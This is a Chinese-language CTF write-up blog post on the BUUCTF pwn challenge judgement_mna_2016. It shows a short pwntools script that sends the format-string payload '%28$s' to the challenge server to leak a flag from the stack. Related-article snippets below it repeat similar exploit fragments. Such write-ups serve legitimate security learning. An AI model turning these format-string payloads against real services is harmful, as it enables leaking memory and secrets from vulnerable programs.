BUUCTF之“judgement_mna_2016”

最新推荐文章于 2022-11-01 09:16:50 发布
最新推荐文章于 2022-11-01 09:16:50 发布
阅读量131 收藏
点赞数
分类专栏: 二进制pwn学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Probeginner/article/details/122082066
版权

这题本身比较简单,但是增强了一丝丝漏洞意识

在这里插入图片描述
看到flag在文中又看到printf显然想到格式化字符串漏洞泄露内存,,,
关键是计算偏移:这里我再次分别利用ubuntu21 和ubuntu 16都gdb调试了一下,发现ubuntu21的调试偏移计算结果不一样,,,,,离谱之。

from pwn import*
p=remote('node4.buuoj.cn',28336)
payload="%28$s"
p.sendlineafter("flag >>",payload)
p.interactive()
Hvf0x
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF]PWN——judgement_mna_2016(32位fmt)
mcmuyanga的博客
03-18 431
judgement_mna_2016 例行检查,32位程序,开启了canary和nx 运行一下,看看大概的情况 32位ida载入 明显的格式化字符串漏洞,动调看一下输入点的位置,找一下flag在栈上的位置,算一下偏移就能够打印出flag 先找一下输入点参数在栈上的位置 可以看到在oxffffcf4c,然后看一下栈上的布局 发现在距离我们输入的数据的偏移为28和32处存放着flag,定位偏移到该处即可 这题根本不用写exp,但为了水长度,贴一下吧 from pwn import * conte
[BUUCTF-pwn]——judgement_mna_2016
Y_peak的博客
03-31 231
[BUUCTF-pwn]——judgement_mna_2016 还行的一道题, 不过动态调试的时候, 需要你手写一个flag.txt文件, 不然没办法动态调试. 一看就知道这个地方储存的flag, 如果不确定. 可以去看下start函数的汇编, 执行main函数前就已经将flag写入了 下面我们只需要计算偏移输出就好, 记得自己在目录下面写个flag.txt文件, 不然没办法调试的. 偏移0x1c 或者 0x20都可以 exploit from pwn import * #p = process('.
judgement_mna_2016
z1r0的博客
02-16 295
judgement_mna_2016 查看保护 这里有一个格式化字符串,flag也被放到栈上去了。 这题目很简单,flag在栈上,动调一下看一下flag的偏移然后借助格式化打印出来就行了 28的偏移 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27337)
judgement_mna_2016(32位fmt)
m0_51251108的博客
11-05 150
judgement_mna_2016: 32位 逆向分析: main函数: alloca是一个内存分配函数,与malloc,calloc,realloc类似。 _alloca是在栈(stack)上申请空间,用完马上就释放. 输入函数,getline细看: 控制字符,可打印字符 init函数: load_flag函数: 解题: 没思路了,看其他师傅 麻了,原来有个格式化字符串漏洞, 上面大都废话 112/4=32 参考师傅:https://blog.csdn.net/mcmuyanga/art
diary_mna_2016
seaaseesa的博客
07-24 370
diary_mna_2016 首先,检查一下程序的保护机制 然后检查一下沙箱机制,发现禁用了execve还有open函数,但是没有堆sys_number的范围进行判断,因此,可以利用retf切换到32位模式绕过沙箱。 然后,我们用IDA分析一下,输入函数存在off by one。 程序自己用链表实现了一个堆块管理器。 其free功能使用的是unlink,将堆块取出、合并等操作,但是缺少链表完整性检查 这里,我们unlink不能直接将got表修改为system_add.
Judgement_labview结果判定汇总vi_
09-29
实现多路labview 结果判定,并通过布尔灯显示结果
dog_cat_judgement
03-18
dog_cat_judgement
mk_显著性_MK趋势分析_
10-02
显著性趋势判断,分析一个趋势是不是具有显著性的matlab代码(Significance trend judgement)
Critique of Judgement
03-20
康德的《判断力批判》的英文版,Pluhar翻译,1987年出版。
Pour-Judgement
04-01
倒判 标题 一个软件应用程序,可提供任何专业人士或家庭调酒师所需的所有鸡尾酒配方。 副标题 该应用程序将鸡尾酒配方全部放在一个地方,并以易于阅读的方式进行格式化。 概括 Pour Judgment旨在为用户带来各种鸡尾...
BUUCTF pwn2_sctf2016
红叶的博客
11-01 471
本题难点:绕过字符串大小限制以及是否掌握了ret2libc。
BUUCTF-PWN刷题记录-10
weixin_44145820的博客
04-19 837
目录wustctf2020_number_game(neg操作原理)zctf2016_note2(强制转换溢出,unlink)wustctf2020_name_your_cat wustctf2020_number_game(neg操作原理) 需要输入一个数,变为负数之后还是负数 这题就设计计组知识了,neg的操作为按位取反+1,而0x80000000取反加一之后仍然是0x80000000,所以...
buuctf ciscn_2019_final_5 calloc整理机制修改tcache的fd puts \0泄漏 signal信号
carol2358的博客
08-14 571
ciscn_2019_final_5 有趣的题目 涉及位级操作 漏洞的关键是index为16时,二进制为1 0000 edit 他们都是认heap_ptr里最后一个16进制来判断他是index几的,index1最后一位就是1,2就是2,8就是8,4就是4,但问题是他存储是按照你申请的顺序存的,和这个index没啥关系,漏洞就来了 这题很明显是要你改got表 没有show,就把free改成puts来泄漏 exp: from pwn import * from LibcSearcher import ...
BUUCTF 周练 Week1
weixin_44229639的博客
11-03 2739
Week 1 Q1 axb_2019_brop64(这题本来是盲打,buuoj给了源文件难度减少了很多) ​ IDA分析发现,read函数长度存在栈溢出 ​ checksec结果,没有Canary和PIE,可直接利用栈溢出构造rop ​ 本题靶机使用的是Ubuntu16 ​ 使用libc-2.23.so (或者可使用LibcSearcher 寻找对应libc) 构造rop思路: ​ 在此之前 puts函数已被调用,其GOT表被覆盖为真实的函数地址,可利用ROPgadget 得到real_puts_
“推荐系统”相关资源推荐
06-14
推荐了国内外对推荐系统的讲解相关资源
全渠道电商平台业务中台解决方案.pptx
06-14
全渠道电商平台业务中台解决方案.pptx
云计算企业私有云平台建设方案.pptx
06-14
云计算企业私有云平台建设方案.pptx
通过CNN卷积神经网络对盆栽识别-含图片数据集.zip
最新发布
06-14
本代码是基于python pytorch环境安装的。 下载本代码后,有个requirement.txt文本,里面介绍了如何安装环境,环境需要自行配置。 或可直接参考下面博文进行环境安装。 https://blog.csdn.net/no_work/article/details/139246467 如果实在不会安装的,可以直接下载免安装环境包,有偿的哦 https://download.csdn.net/download/qq_34904125/89365780 安装好环境之后, 代码需要依次运行 01数据集文本生成制作.py 02深度学习模型训练.py 和03pyqt_ui界面.py 数据集文件夹存放了本次识别的各个类别图片。 本代码对数据集进行了预处理,包括通过在较短边增加灰边,使得图片变为正方形(如果图片原本就是正方形则不会增加灰边),和旋转角度,来扩增增强数据集, 运行01数据集文本制作.py文件,会就读取数据集下每个类别文件中的图片路径和对应的标签 运行02深度学习模型训练.py就会将txt文本中记录的训练集和验证集进行读取训练,训练好后会保存模型在本地
select DATE_FORMAT(a.year, '%Y'),COALESCE (cnt,0) from fgz_plyj.year_dict a left join (select DATE_FORMAT(b.judgement_date, '%Y') as judgement_date,count(DATE_FORMAT(b.judgement_date, '%Y')) as cnt from fgz_plyj.case_fix_attrs b inner join fgz_plyj.attr_judges c on b.case_id=c.case_id inner join fgz_plyj.court_url d on b.case_id=d.case_id where b.trial_round ='二审' and b.case_type='改判' and d.is_dup='N'and DATE_FORMAT(d.create_time, '%Y')=DATE_FORMAT(NOW(), '%Y') group by b.judgement_date) e on DATE_FORMAT(a.year, '%Y')=e.judgement_date where DATE_FORMAT(a.year, '%Y')<DATE_FORMAT(NOW(), '%Y')+1 and min(judgement_date)>DATE_FORMAT(a.year, '%Y') order by DATE_FORMAT(a.year, '%Y') desc ;分析一下这个sql
07-08
3. 子查询中,首先从`case_fix_attrs`表中选择了`judgement_date`的年份,并将其格式化为年份形式(`DATE_FORMAT(b.judgement_date, '%Y')`)。然后使用`COUNT()`函数对每个年份进行计数,并将计数结果命名为`cnt`。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值